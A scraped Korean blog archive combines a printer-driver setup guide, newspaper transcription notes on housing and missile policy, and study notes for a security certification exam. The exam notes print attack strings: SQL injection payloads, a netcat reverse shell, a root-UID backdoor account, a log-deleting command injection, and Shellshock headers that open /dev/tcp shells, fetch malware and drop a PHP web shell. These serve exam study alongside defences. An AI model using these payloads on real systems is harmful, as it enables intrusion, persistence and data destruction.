SMALL

교세라 프린터 (TASKalfa 4052ci) 페키지 설정 방법.

(다른 모델도 적용 가능한듯)

교세라 프린터가 같은 허브 OR 스위치에 연결되어 있으면 자동 설치를 통해서 쉽게 설치 가능하지만, 

L2,L3 스위치에서 한번이라도 업링크를 타고 라우팅이 되면 프린터 MAC 주소와, IP 주소가 검색이 안되는 문제로 인해서 프린터 검색이 안되서 자동설치가 어려운 부분이 있다. 

페키지 설정 방법을 통해서 미리 장치 명과, IP를 등록하여 페키지 파일을 생성하면 사용자들은 단 한번의 클릭으로 다른 설정없이 프린터 사용이 가능하다. 

TIP. ping을 통해서 프린터가 네트워크 가 되는 환경인지 확인이 되어야 적용 가능하다.


1. 아래 링크를 통하여 교세라 프린터 드라이버를 다운 받을 수 있다.

https://www.kyoceradocumentsolutions.com/kr/download/index_ko.html

 

Download Center Korea | 한국 | KYOCERA Document Solutions Asia

본 소프트웨어의 사용 및 설치 전에 이 사용권 계약서를 잘 읽어보시기 바랍니다.본 소프트웨어를 사용 또는 설치함으로써 사용자는 본 사용권 약관 및 조건에 동의하는 것으로 간주됩니다. 본

www.kyoceradocumentsolutions.com

2. 다운로드를 받고 압축을 풀면 아래와 같은 폴더와 파일이 나오고 Setup 버튼을 누르고 설치를 진행한다.

3. 맞춤형 설치를 클릭한다.

4.맞춤형 장치를 추가하세요 클릭

5. 장치 모델을 선택하여 주세요.

6.포트 추가를 눌러주세요.

7. 다음을 클릭하고 프린터 IP 주소를 입력하여 주세요. 포트 이름은 자동으로 입력도 되고 이름 변경도 가능합니다.

8. 다음 버튼을 클릭합니다.

9. 마침 버튼을 클릭합니다.

10. 확인 버튼을 클릭합니다. 

11. 설치 옆 패키지 클릭(유틸리티를 클릭해서 포트설정등을 포함해서 페키지 설정 가능)

12. 설치 파일 생성. 완료 ~

위의 파일만 클릭하면 알아서 드라이브에 IP 가 설정되어 있어 쉽게 사용이 가능~~

LIST
SMALL

마켓 지수

 

1면

'임대차 3법' 가운데 마지막으로 전·월세 신고제가 다음달부터 시행된다. 지난해 7월 말 도입된 전·월세상한제와 계약갱신청구권제는 전세의 씨를 말리고 있다. 전세 매물을 구하지 못한 세입자들이 매수에 나서면서 집값을 끌어올렸다. 여기에 신고제까지 적용되면 전세는 물론 월세마저 줄어들 것이라는 우려가 나온다. 27일 서울부동산광장에 따르면 계약갱신청구권제 등이 시행된 작년 8월부터 지난달(26일 신고 기준)까지 9개월동안 서울 아파트 전세 거래는 8만2847건으로 집계됐다.

시세대로 보증금을 못 받게 된 집주인들은 전세를 월세로 바꾸고 있다. 지난 26일 기준 서울 월세(반전세 포함) 매물은 1만6742건으로 한 달 전(1만5672건)보다 6.8% 늘었다.

실무에서도 나타나고 있습니다.

전세물량이 줄어들고, 물량이 없으니 집주인들은 전세가를 올려서 내놓는 현상입니다.

임대차 3법으로 인해 전세금 5%인상밖에 하지 못하니, 만기가 안된 세입자가 나가고 싶다고 하니, 집주인이 복비를 다 대주면서 나간다고 합니다.

그리고 집주인은 현재 올라간 전세가로 다시 전세입자를 구합니다.

임대차 3법에 부족한 공급물량으로 인해 앞으로 전세구하기 더 힘들어 질거 같네요.

 

 

부동산

 

더불어민주당이 27일 내놓은 부동산대책은 다주택자들이 매물을 내놓도록 압박하는 동시에 1주택자와 보유세 부담을 낮춰주는 내용을 담았다.

무주택 서민에 대해선 담보인정비율(LTV)과 같은 대출 규제를 완화, 내집 마련을 지원하는 방안들도 포함됐다. 하지만 주택임대사업자 제도를 전면 폐지하면서 기존 세제 혜택까지 대폭 축소한 것은 개인의 재산권을 과도하게 제한했다는 비판이 나오고 있다. 입법 과정에서도 적지않은 논란이 예상된다.

어제 더불어민주당에서 부동산대책을 발표했습니다.

 

 

비가 조금씩 내리면서, 오늘두 날씨가 쌀쌀하네요.

모두 화이팅입니다^^

 

 

LIST
SMALL

 

서울 강북에도 쉽게 엄두내기 어려운 값비싼 아파트가 많다. 대개 뉴타운 아파트들이다. 20억원에 육박하는 마포래미안푸르지오(전용 84㎡, 아현뉴타운)도 10여 년 전에는 6억~7억원대의 고(高)분양가로 분양 성공을 장담하기 어려웠다. 그랬던 곳이 주변기반시설이 현대화하고 강남에서 이사온 이들이 늘면서 강남의 아성에 도전할 정도가 된 것이다.

내년이면 뉴타운 사업이 20년을 맞는다. 강남·북 균형발전, 주택 공급 확대, 난개발 방지를 목표로 내건 뉴타운 사업은 2002년 이명박 당시 서울시장 때 본격 시작됐다. 길음·은평·왕십리가 시범지구로 선정됐고, 이후 2006년까지 모두 35개 지구로 대상지가 넓어졌다. 문제는 지정만 돼도 집값이 4~5배가 뛰고, 이른바 '쪼개기' 투기가 만연하고, 세입자들이 외곽으로 밀려나는 등의 부작용이었다. '뉴타운 난민'이 57만 명에 달했다는 추계도 있다.

결국 박원순 전 서울시장은 2012년 뉴타운 수습 방안을 내놓기에 이르렀다. 전면 철거식 재개발을 지양하고, 시민 삶을 보존하면서 도시 경관을 살리겠다는 취지였다. 이로 인해 683개까지 늘어났던 서울시내 재개발·재건축 구역 중 지정 해제된 곳만 394곳에 달한다. 서울 아파트 총량의 20%이 약 25만 가구의 새 아파트 공급이 중단된 결정적 계기였다.

하지만 박원순식 도시재생은 낡은 집과 환경은 그대로 둔 채 벽화만 잔뜩 그리고 골목 가로등을 교체하는 데 그쳤다는 비판을 듣는다. 문재인 정부도 5년간 매년 100곳, 10조원의 공적 재원을 투입해 '도시재생 뉴딜사업'을 펼치겠다고 했지만 '골목 재생' 이상의 성과를 내지 못하고 있다. 청년·창업을 테마로 내건 용도 불명의 개점휴업 공간만 늘었다.

이렇듯 혼선을 보이던 서울의 개발정책이 오세훈 서울시장이 취임하며 '뉴타운 부활'로 급선회하고 있다. 서울시는 재개발 활성화를 통해 향후 5년간 13만 가구의 주택을 공급하겠다는 방침이다. 재개발 속도 조절용 '대못'인 주거정비지수제도도 폐지하겠다고 했다.

세상 이치가 그렇듯, '개발·성장'과 '보존·재생' 이란 가치는 어느 한쪽으로만 흘러선 안 된다. 균형을 찾겠다며 반대쪽으로 너무 잡아끌어선 난파하고 마는 게 사회정책이다. 공공 주도에 대한 미련을 접고, 공간·산업·교통 등 도시의 주요 인프라와 긴밀하게 연계한 도시개발 전략이 필요하다. 감성팔이 도시재생은 그만둘 때가 됐다.

https://www.hankyung.com/opinion/article/2021052774551

ㅡㅡㅡㅡㅡㅡ

 

※ 뉴타운 사업 : 2002년부터 서울특별시에서 추진한 재개발 방식

뉴타운 사업을 진행한지 20년이다.

예전에 뉴타운에 대한 관심이 덜한 것 같은데,

최근에 신축에 대한 수요가 워낙 강해지다보니 뉴타운으로 묶인 곳만 해도 가격이 다른세상이다.

 

 

 

 

LIST

'도치의 필사' 카테고리의 다른 글

벤자민 버튼과 피터팬 증후군  (0) 2021.06.02
날씨가 왜이래  (0) 2021.06.01
동북아 '미사일 삼국지'  (0) 2021.05.27
정치판 '3040세대' 돌풍  (0) 2021.05.26
필사 5.21) 행복지수와 삶의 질  (0) 2021.05.25
SMALL

알기사 PART 03 어플리케이션 요점 정리

  1. DNS
    1. Zone 파일 개념
      1. ZONE 관리하는 도메인 영역
      2. ZONE  FILE  관리 도메인에 대한 정보를 담고 있는 파일
    2. 질의 유형(암기)
      1. ANY : 도메인에 대한 모든 레코드 질의 (DRDOS로 악용)
      2. TXT : SPF 발송자 메일서버 인증 (DRDOS로 악용)
      3. AXFR : 존 버전에 상관없이 무조건 존 전송 요청
        1. EX) dig@192.168.100.10 dochi.com axfr
      4. IXFR : 존 버전을 비교하여 상위 버전일 경우 존 전송 요청 ( I = increase)
        1. EX) dig@192.168.100.10 dochi.com ixfr=2017033101
    3. dig 명령어
      1. dig@[네임서버] 도메인 [쿼리유형] [쿼리옵션]
      2. 쿼리 옵션
        1. +norecurse :authoritative 네임서버에 반복적 질의를 수행하여 정상 응답 여부 점검
        2. +tcp : 53/tcp 허용 여부를 점검
        3. +trace : 계층적 위임설정 상태 점검, 최상위 루트 도메인부터 최종 질의대상 도메인까지 계층 구조에 따른 질의 수행
    4. DNS Spoofing 공격
      1. DNS 서버의 Cache 정보를 조작하여 희생자가 의도하지 않은 주소로 접속하게 만드는 공격
      2. UDP 프로토콜의 비연결 특성 취약점을 이용한 것
      3. 식벽하기 위해서는 Transaction ID, 출발지 목적지 주소 필요
      4. 대응책
        1. named 대몬을 최신버전으로 패치
        2. 스니핑을 기본으로 하기 때문에 스니핑을 탐지 및 차단
        3. 중요한 host는 hosts 파일에 직접 등록
    5. DNS Cache Poisoning 공격
      1. DNS 서버 자체를 공격한다.
      2. 다수의 조작된 응답 공격대상 DNS 서버로 전송
      3. 대응책
        1. DNS를 최신버전으로 패치
        2. 사용자를 제한하여 허용하도록 설정
        3. DNSSEC을 사용
    6. 재귀적 질의
      1. named.conf
        1. allow-recursion {none;};
        2. allow-recursion{192.168.110.1;192.168.100.0/24}
        3. allow-transfer {none;};
        4. .allow-transfer{192.168.100.2;};
  2. SQL Injection
    1. From SQL Injection
      1. 특수문자(',") 입력시 에러메시지 발생여부 확인으로 취약한지 파악 가능
      2. 'or 1=1# , 'or '1'=1#, 'or 'a' = 'a'# 등 조건절을 무조건 참으로 만드는 입력값을 삽입
      3. 대응책
        1. php.ini 파일의 "magic_quote_gpc=on
        2. \(back slash)를 통한 익스케이프
        3. mysql_real_escape_sting() 함수 사용
        4. SQL Injection을 수행할 수 있는 블랙리스트 생성
        5. 선처리 질의문
    2. Union SQL Injection
      1. 한 쿼리의 결과를 다른 쿼리의 결과에 결함하여 공격하는 기법
      2. union Select 를 파악하기 위해서 선행 select와 후행 select문의 컬럼 개수가 일치 해야한다.
      3. order by1 #을 통한 에러 메시지로 컬럼 개수 파악이 가능하다.
      4. 중요 코드 'union select 'admin','admin','admin'#
    3. Stored Procedure SQL Injection
      1. SQL_Serverdml xp_dirtree 확장 프로시저 실행
      2. index.php? no=123; EXEC master..xp_dirtree 'C:/'
      3. ; (세미콜론) 문자를 통해 명령어를 연속 수행
    4. Mass SQL Injection
      1. 대량의 DB 값이 변조
      2. Mass SQL Injection 이 발생하여 테이블의 문자형 컬럼 데이터 모두에 악성코드의 유포지 정보를 삽입
      3. 대응법
        1. 특수문자 필터링(블랙리스트 등록)
        2. 입력되는 문자열의 길이 제한
        3. MS_SQL의 경우 악용되는 프로시저 제거
        4. 웹 어플리케이션 데이터베이스 사용자 권한 제한
        5. 선처리 질의문
    5. Error-Based SQL Injection
      1. 에러 값을 기반으로 한 단계씩 점진적으로 DB 정보를 획득하여 공격하는 기법
    6. Bilnd SQL Injection
      1. 쿼리 결과의 참 거짓을 통해 의도하지 않은 SQL문을 실행하여 공격하는 기법
      2. 중요 코드 'and 1 =1 #(참)' and 1=2#(거짓)
      3. information_schema :DB에 대한 메타데이터를 제공하는 스키마
      4. information_schema.table : DB에 있는 모든 테이블 정보를 가지고 있는 테이블
      5. information_schema.columns : 데이터베이스에 있는 모든 테이블의 컬럼정보를 가지고 있는 테이블
      6. limit, substr 을 이용하여 컬럼명 문자를 하나씩 순서대로 추출
    7. 크로스 사이트 스크립트 (XSS)
      1. 게시판 같은 곳에서 사용자 입력값에 대한 필터링이 제대로 이루어지지 않을 경우, 악의적인 스크립트 삽입 공격
      2. Stored XSS
        1. 악성 스크립트가 저장된 게시판의 자료를 요청하여 악성코드 스크립트가 동작하는 방식
        2. iframe 테그
        3. 대응법
          1. htmlspecialchars()
          2. <script> alert()</script>
      3. Reflected XSS (반사형 XSS)
        1. 악성 스크립트가 포함된 요청 정보를 처리하는 과정에서 악성 스크립트가 포함된 응답 페이지가 생성되어 공격하는 방식
      4. DOM based XSS
        1. 응답 페이지에 관계없이 웹브라우저에서 발생한다. 단, 응답 페이지의 자바 스크립트가 DOM 객체를 통해 요청 URL의 파라미터가 참조하면서 악성 스크립트가 동작하게 된다.
        2. 대응법
          1. 사용자의 입력값에 대한 검증은 클라이언트가 아닌 서버에서 해야된다.
          2. HTML 특수 문자 코드로 입력되는 값들은 이스케이프 처리 한다.
          3. HTML 테그를 허용해야 하는 것만 화이트 리스트 정책을 적용한다.
      5. 크로스 사이트 요청 변조 (CSRF)
        1. 비정상적인 경로와 정상적인 경로를 구분하지 못하게 만들어서 게시판 설정 변경, 회원 정보 변경등의 문제를 만드는 공격
        2. <img src ="조작된 요청">
        3. 대응책
          1. HTTP 요청 내에 예측할 수 없는 임의의 토큰을 추가하여 정상적인 요청과 비정상적인 요청을 판별하도록 한다.
          2. 중요한 기능에 대해서는 사용자 세션검증 또는 재인증을 받도록 한다.
      6. 운영체제 명령 실행
        1. ;,&&,||, 등 2개 이상의 명령어를 연속해서 실행하는 명령어들
        2. 리눅스 URL 파라미터에 ls, cat 등의 명령어 삽입
        3. 윈도우 URL 파라미터에 dir, config 등의 명령어 삽입
        4. 대응법
          1. 운영체제 명령어를 실행할 수 있는 문자가 포함되어 있는지를 필터링
          2. 화이트 리스트 명령어
      7. 파일 업로드 취약점
        1. 파일 업로드 기능으 존재하여 웹쉘을 업로드 하여 실행 하는 취약점
        2. 대응법
          1. 확장자에 대한 적절한 필터링
          2. 업로드 파일을 저장하기 위한 전용 디렉토리를 별도 생성
      8. 파일 다운로드 취약점
        1. 파일 다운로드시 파일의 경로 및 파일명을 파라미터로 받아 처리하는 경우 값을 조작 하여 다운 받을 수 있다. 
        2. 디렉터리 트레버셜 : URL 주소에 ../ 상위 디렉터리로 이동 후 특정  파일을 호출하는 방식
      9. 파입 삽입 취약점
        1. include(), require() 함수
        2. 대응법
          1. php.ini allow.url.fopen =off
      10. 약한 문자열 강도 취약점(디션어리 공격)
      11. 정보 누출 취약점
        1. httpd.conf Error Document 페이지 설정
        2. php.ini display_error = off
      12. HTTP 응답 분할 취약점
        1. HTTP 응답 헤더에 포함 되어 있는 클라이언트에 다시 전달될 때, 개행문자인 CRLF 포함되면 응 답이 2개로 분리 가능
        2. 대응책
          1. 클라이언트 요청 파라미터값이 서버 프로그램에서 쿠키로 사용 되거나, 리다이렉션을 위해 Location 응답 헤더로 사용 되거나, 기타 응답 헤더 설정에 사용될 경우 적절한 필터링을 통해 차단
          2. 중요 정보를 보여주는 페이지는 케쉬를 사용하지 못하도록 설정한다.
      13. 디렉터리 인덱싱/ 리스팅 취약점
        1. 응답 메시지 <title> index of /home/board</title>
        2. httpd.conf options-indexes FllowSynLink
        3. tomcat(web.xml) listing 파라미터를 false 로 설정
      14. 웹 메소드 취약점
        1. <LimitExcept GET POST>
          1. order allow, deny
          2. deny from all
        2. </LimitExcept>
      15. 관리자 페이지 노출 취약점
        1. 관리자 페이지에 대한 접근 제어 설정
          1. <Directory "/var/www/html/admin">
            1. order Deny,Allow
            2. deny from all
            3. Allow from 192.168.159.153
          2. </Directory>
      16. 검색엔진 정보 노출 취약점
        1. robots.txt
      17. 기타 웹서버 보안 대책
        1. 심볼릭 링크 사용 설정 제거
          1. option -indexes -FollwsymLinks
        2. 해더 정보 최소화
          1. ServerTokens
            1. proc
            2. min
            3. os
            4. full
        3. 웹서버 설정파일 주요 내용
          1. ServerRoot "/etc/httpd"
          2. pidFile "run/httpd/pid" 웹서버가 기동될때 자신의 PID를 기록한 파일의 위치 설정
      18. 웹로그 분석
        1. 클라이언트가 웹서버에 접속하면 웹서버가 응답한 내용은 엑세스 로그(access log) 파일에 기록,
        2. 오류 응답은(error log)
      19. 보안서버
        1. 정보통신망에서 송,수신 하는 정보를 암호화하여 전송하는 웹서버
        2. 취약한 암호화 통신 방법으로 알려진 SSL2.0, SSL3.0 프로토콜을 비활성화
          1. ssl.conf 파일 설정
            1. SSLProtocal all -SSLv2 -SSLv3
            2. SSLProtocal -all +TLSv1 +TLSv1.1 +TLSv1.2
          2. 취약한 암호 방식 제거
            1. ssl.conf
              1. SSLCiperSuite ALL -> 취약한 설정
              2. SSLCiperSuite ALL :!aNULL:!EXP:!ADH:!DES:!RC4:!MD5

 

 

 

 

 

 

 

LIST
SMALL

알기사 PART 04 침해사고 분석 및 대응

1)snort

1. ->, <-> 방향지시자는 있으나 <- 방향지시자는 없음에 주의

2.Action 유형

  1. alert: 탐지모드 가장 많이 사용
  2. drop: 패킷을 차단하고 로그에 남긴다 (iptables 와의 차이)
  3. reject: drop rule과  동일하게 패킷을 차단하고 로그에 남긴 후 TCP일 경우 TCP Reset을 전송하고, UDP의 경우 ICMP port unreachable 메시지를 전송한다.

3.패턴메치 사용이유

  1. offset -> depth
  2. distance -> within
  3. 성능향상과 오탐을 줄여주는 장점

4. alert tcp any any -> any any (msg:"요요요요"; content:"1234";offset:2;)

5. 룰 바디 설정 : Event Threshold (이벤트 제한) 관련 옵션

  1. threshold type limit, track by_src, count 2, seconds 10 : 출발지 IP를 기준으로 매 10초 동안 2번째 이벤트 까지 action 수행
  2. threshold type threshold, track by_src, count10, seconds 5 : 출발지 IP를 기준으로 매 5초 마다 10번째 이벤트 마다 action 수행
  3. threshold type both, track by_src, count10, seconds 1 : 출발지 IP를 기준으로 1초 동안 10번째 이벤트시

6.정규표현식 prce

  1. ^문자열의 시작을 의미
  2. $ 문자열의 끝을 의미

7. 파일 속성 변경후 재설치

  1. lsattr /bin/ps /bin/netstat
  2. chattr -ia

1.리버스 쉘(Reverse Shell)

  1. 바인드 쉘 : 클라이언트 -> 서버
  2. 리버스 쉘 : 서버 -> 클라이언트
    1. netcat 명령어
    2. 리스닝 nc -lvp 80
    3. 공격자 nc 10.10.10.80 -e /bin/bash
  3. useradd 명령어 옵션
    1. -o uid 중복을 허용하는 옵션으로 해당 옵션이 없으면 root 계정의 uid와 중복되기 때문에 계정 생성에 실패한다.
    2. -d 홈디렉터리를 지정
    3. useradd -o -u 0 -g 0 -d /root
  4. crontab
    1. 분,시,일,월,요일

2.루트킷 침해 사고

  1. 공격자는 리버스 쉘을 이용하여 공격 행위 은닉을 위한 루트킷을 웹서버에 설치
  2. 익스플로잇 : 소프트웨어나 하드웨어의 버그 또는 취약점을 이용하여 공격자가 의도한 동작이나 명령어를 실행하도록 하는 코드 또는 그러한 행위
  3. 버퍼 오버플로우 익스플로잇
    1. 스택의 버퍼를 NOP(no operation) 0x90 (아무런 동작업이 다음 명령어로 넘어간다) 로 채운다.
  4. 공격 시나리오
    1. 공격자는 사이트의 웹서버 취약점 스캔을 통해 Tomcat 웹서버의 관리자 페이지가 외부에 노출, 초기 아이디와 페스워드 사용
    2. 리버스 쉘을 이용하기 위해 루트킷을 설치하고 지속적인 접근을 위해 cron 테이블에 등록
    3. 주기적 공격 수행
  5. 분석 시나리오
    1. 관리자는 로그 분석을 통해 취약점 스캔 발생 파악, 관리자 페이지가 정상 200 로그인된 사실 을 파악
    2. 관리자는 공격자가 관리 페이지의 업로드 기능을 이용하여 악성코드를 웹서버로 유포했을 가능성이 있다고 판단하여 루트킷 탐지 도구로 점검
      1. chkrootkit -q
      2. find / -type f -mtime -10
    3. 관리자는 변조된 명령어를 재설치 하기 위해 rpm 명령어를 이용해 패키지 재설치 중 문제점을 발견
      1. lsattr i 속성이 있으면 삭제가 안됨
      2. chattr 명령을 통해 i 속성을 제거
    4. 관리자는 cron에 설정이 되어 있는 것을 파악
    5. 관리자는 현재 공격자가 리버스 쉘을 연결하고 있는지 여부를 확인하기 위해 netstat 명령을 실행한 결과 현재 공격자와 bash 쉘 이 연결되어 있는 것을 확인
    6. lsof 프로그램을 이용한 정보 수집

3. Drive By Download 침해 시나리오

  1. 공격시나리오
    1. 공격자는 경유지와 중계지로 사용할 웹서버를 확보하기 위해 여러 사이트를 대상으로 취약점 스캔을 하고, 웹쉘 및 악성 자바스크립드를 업로드
    2. 공격자는 웹쉘을 통해 알기사 웹서버의 기본 페이지와 쇼핑몰 웹서버의 기본 페이지를 변조하여 악성 스크립트 삽입 구문을 추가한다.
    3. 공격자는  웹서버에 운영체제 명령 실행 취약점이 존재한다는 사실을 확인하고 자신의 접근 흔적을 지우기 위해 웹서버의 액세스 로그 삭제를 시도한다.
      1. 127.0.0.1 ; rm -rf /var/log/httpd/access_log
    4. 공격자는 유포지에 접속한 사용자의 IE 브라우저 취약점을 이용하여 익스플로잇 수행, 리버스 쉘을 획득한다.
    5. 공격자는 사이트의 기본 페이지에 삽입한 자바스크립트 파일을 통해 사용자 쿠키 정보를 탈취하여 공격자 웹서버에 저장
  2. 분석시나리오
    1. 알기사 사이트 보안 담당자는 KISA로 부터 사이트가 악성코드 경유지 중꼐지로 사용되고 있다는 연락을 받음
    2. 보안 담당자는 악성 스크립트로 의심되는 신규 자바스크립트 파일을 분석, 다른 사이트의 iframe 태그가 포함된것을 확인
    3. 분석 결과 사용자 쿠키 정보를 탈취하는 코드 확인
    4. 기본 페이지가 변조되어 스크립트가 삽입된것을 확인
    5. 보안담당자는 Drive By Download 공격을 위한 악성코드 경유지로 사용된것으로 파악

난독화

  1. eval() 함수는 인자로 받은 문자열이 자바스크립트 코드가 맞는지 검증한 후 이를 실행하는 함수로 악성 스크립트에 자주 등장하는 함수 이다.
  2. unescape() 16진수로 %인코딩된 문자열을 디코딩

웹쉘

  1. 웹쉘은 웹서버 내 임의의 시스템 명령을  실행할 수 있는 서버 스크립트 파일을 말하며, JSP,PHP,ASP등오로 만들어 진다

디페이스 공격

  1. 웹사이트 화면을 해커가 원하는 화면으로 바꾸고 해킹 성공을 알리는 공격으로 시각적으로 자신의 존재감을 알리고 정치적인 메시지나 자신의 실력을 과시하는 목적으로 사용

보안솔루션 종류 및 특징

  1. 웹방화벽
    1. .KISA -> 캐슬
    2. ATRONIX -> Webnight
    3. TrustWave -> ModSecurity
  2. NAC
    1. PacketFence
    2. FreeNAC
  3. 네트워크 /단말 정보유출방지(DLP)
    1. 네트워크 DLP
    2. 단말 DLP 
  4. 전사적 통합보안관리 시스템(ESM)
    1. 다양해지는 보안 위협으로 인해 단일 보안장비로는 위협에 대응하기 어려워 여러 보안장비를 도입하게 되고 그에 따른 관리의 어려움이 발생함에 따라 다양한 보안장비와의 로그와 이벤트 정보를 통합해서 관리하지 위한 목적으로 만들어짐

주요취약점

  1. shellshock
    1. 환경변수의 함수 선언문 뒤에 임의의 명령어를 삽입할 경우 환경변수에 설정된 함수 선언 시 함수 선언의 끝을 인지하지 못하고 삽입한 명령어까지 실행하는 취약점
    2. GNU Bash() { 시작하는 함수 선언 문자에서 취약점이 발생된다.
    3. User-Agent;() { : ; } ; /bin/bash > /dev/tcp/10.10.10.10/8081 < &1
      1. /dev/tcp 는 bash에서 지원하는 특수한 장치 파일, TCP 소켓을 생성
      2. TCP 클라이언트 소켓으로 출력 리다이렉션을 함 ,  bash의 표준출력이 TCP 클라이언트 소캣으로 재지정
    4. User-Agent:() { : ; } /usr/bin/nc 10.10.10.10 8081 -e /bin/sh
    5. 악성코드 다운로드 유형
      1. Accept-Encoding: (){ ; : }; /bin/bash -c "/usr/bin/wgent -O /tmp/xyz http://10.10.10.10/malware.; /bin/chmod777 /tmp/xyz; /bin/rm -rf /tmp/xyz"
    6. 웹쉘 생성 유형
      1. User-Agent : () { ; : }; echo "<? \$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd!=\"\"){print shell_exec(\$cmd);} ? >" >..html/x.php
        1. x.php 라는 파일로 저장하도록 하고 있다.
        2. x.php 파일은 php 구문으로 만들어진 웹쉘 파일로 외부에서 공격자가 cmd 파라미터에 명령어를 담아서 x.php를 요청할 경우 cmd 파라미터에 값이 있으면 shell_exec() 함수를 이용하여 명령어를 실행
      2. 대응방안
        1. 취약한 버전의 Bash를 사용하면 업데이트
        2. CGI 서비스의 사용 유무를 확인해서 안쓰면 사용 중지
        3. 네트워크 보안 장비 공격에서 시그니처를 등록 차단
  2. 하트블리드 취약점
    1. 하트블리드 취약점은 통신 구간 암호화를 위해 많이 사용하는 OpenSSL 라이브러리의 하트비트 확장 모듈읠 버그로 인하여 발생한 취약점으로 서버에 저장된 주요 메모리의 데이터가 노출되는 취약점
    2. 주요내용
      1. 공격자는 하트비트 패킷 헤더에서 페이로드 길이 필드를 조작하여 서버에 전송
      2. 서버는 공격자가 요청한 길이 만큼 메모리에서 데이터를 추출하여 공격자에게 응답
    3. 대응방안
      1. 취약점이 존재하지 않는 OpenSSL로 업데이트
      2. 보안장비 업데이트 
      3. 서비스 관리 측면 대응 방안(재발급)
  3. 프리크 (2015년 2월)
    1. MS사에서 SSL을 통해 강제로 취약한 RSA 로 다운그레이드 시킬 수 있는 취약점
    2. RSA_EXPORT
  4. 로그잼 (2015년 9월)
    1. 서버간의 TLS 통신을 다운 그레이드 시킬 수 있다.
    2. 대응방안
      1. 클라이언트는 최신의 브라우저를 사용한다.
      2. 서버는 명시적으로 EXPORT 사용하지 않는다.
      3. 2048 비트의 타원 곡선 디피 헬만을 사용한다.
  5. 푸들(2014년 10월)
    1. SSL/TLS 협상 시 SSL 3.0 버전
  6. Drown(2015년 3월)
    1. SSLv2.0 취약점을 악용한 교차 프로토콜 공격
    2. SSLv2.0을 사용하지 않도록
    3. OpenSSL를 최신 버전으로 업데이트
  7. NTP 분산 서비스 거부 취약점
    1. monlist
    2. disable monitor ntpd.conf
LIST
SMALL

 

우리나라가 국산 미사일 '백곰'의 시험발사에 성공한 것은 1978년 9월 26일이었다. 당시는 주한미군 감축으로 북한의 위협이 고조되고 있었다. 남북한 간 충돌을 우려한 미국은 미사일 개발에 제동을 걸었다. 한국은 미국의 기술 이전을 조건으로 '사거리 180km, 탄도중량 500kg 제한'에 합의했다.

이 지침은 북한의 미사일 개발 수위가 높아짐에 따라 네 차례 개정됐다. 북한은 1970년대 미사일 개발에 착수해 1980년대에 '스커드-B'(사거리 300km)와 '스커드-C'(500km)를 실전 배치했다. 1990년대에는 사거리 1300km의 '노동'과 첫 장거리(2500km) 미사일 '대포동 1호'를 개발했다. 2016년부터는 잠수함발사 탄도미사일(SLBM)과 대륙간탄도미사일(ICBM)까지 발사했다.

그동안 우리 정부는 '백곰'의 후신인 '현무(玄武)' 시리즈를 통해 탄도중량과 사거리를 조금씩 늘려 오다가 최근 한·미 정상회담에서 관련 제한을 모두 푸는 데 합의했다. 이로써 한국의 미사일 사정권은 북한 전역뿐 아니라 중국 베이징과 일본 도쿄까지 넓어졌다. 중국이 한국을 겨냥한 수백 기의 미사일을 배치한 상황에서 우리도 대응 역량을 갖추게 된 것이다.

중국은 '둥펑(東風)' 등 중거리 미사일만 약 3000기 보유하고 있다. 태평양을 향한 1만8000km 해안에 지대공과 크루즈 미사일 발사대를 촘촘하게 배치했다. 군비 지출 규모도 미국에 이은 2위로, 동북아 지역의 안보 위협을 가중시키고 있다. 미국이 한국 미사일 제한을 풀면서 중국의 세력 확산을 막는 전략을 함께 구사하는 것도 이 때문이다.

물론 주변국이 반발할 수도 있지만, 한국이 국제 규범을 잘 지켜온 나라이기에 주변국과의 마찰 가능성은 크지 않다. 내심 못마땅한 중국도 사드 배치 때처럼 노골적으로 반응하진 않고 있다. 자주국방이야말로 그들이 늘 주장하는 '내정 문제'이기도 하다.

이번 미사일 제한 해제로 한국은 중장거리 미사일과 함께 고체연료, 우주로켓 개발까지 가능해졌다. 한·미 정상은 민간 우주탐사와 과학, 항공 분야에서 파트너십을 강화하기로 약속했다.

이제 한국과 북한, 중국을 둘러싼 '미사일 삼국지'는 글로벌 패권 경쟁이라는 큰 그림 속에 드넓은 우주로까지 그 영역이 확장되고 있다. 이를 뒷받침할 신기술과 외교력 경쟁도 그만큼 더 치열하게 됐다.

https://www.hankyung.com/opinion/article/2021052626901

ㅡㅡㅡㅡㅡ

 

한미 정상회담에서 미사일 발사 거리를 늘릴 수 있다는 내용입니다.

그에 따라 미사일 테마주가 관심받고 있네요 

 

LIST

'도치의 필사' 카테고리의 다른 글

날씨가 왜이래  (0) 2021.06.01
뉴타운의 귀환  (0) 2021.05.28
정치판 '3040세대' 돌풍  (0) 2021.05.26
필사 5.21) 행복지수와 삶의 질  (0) 2021.05.25
필사 5.24) 벌과 인류의 운명  (0) 2021.05.25
SMALL

 

마켓지수

 

1면

국내 유일한 돔구장인 서울 고척스카이돔이 오는 7월 거대한 '메타버스 플랫폼'으로 변신한다. 경기장 안팎의 팬들이 가상현실(VR) 기기를 착용하면, 가상공간에서 자신이 원하는 자리로 이동해 그 시점에서 경기를 즐길 수 있게 된다. 경기장 외야 뒤쪽 관중이나, 집에서 경기를 보는 시청자들이 가상공간에서 심판 위치로 옮겨 투수가 던진 공이 스트라이크인지, 볼인지 확인하는 식이다.

3일 연속으로 메타버스에 대한 내용이 1면을 차지하고 있습니다.

실제 7월부터 고척돔에서 VR을 통한 경기가 진행되고,

K-POP에서는 아바타4인, 아이돌4인의 총 8인의 그룹이 형성되어 최단기간 1억뷰를 돌파하기도 했습니다.

아직 메타버스를 경험하지 못했기 때문에 정확한 느낌은 알 수 없지만,

가상현실에서 누구나 원하는 걸 할 수 있고, 본인이 좋아하는 팬을 더 가까이서 실제처럼 만나는 건 장점이지만,

너무 가상현실에 빠져, 현실과 착각하여 사건사고도 많아지지 않을까 싶은 우려도 생기네요.

 

 

 

 

주식

이연제약이 충북 충주에 차세대 공장 건립계획을 밝힌 건 2017년 8월이었다. 2900억원을 투입해 바이오와 케미컬 의약품을 아우르는 초대형 생산시설을 조성하기로 한 것. "무리수 아니냐"는 얘기가 돌았다. 당시 이연제약의 규모(2016년 매출 1218억원, 영업이익 154억원, 자본총계 1934억원)를 감안하면 그럴 만도 했다.

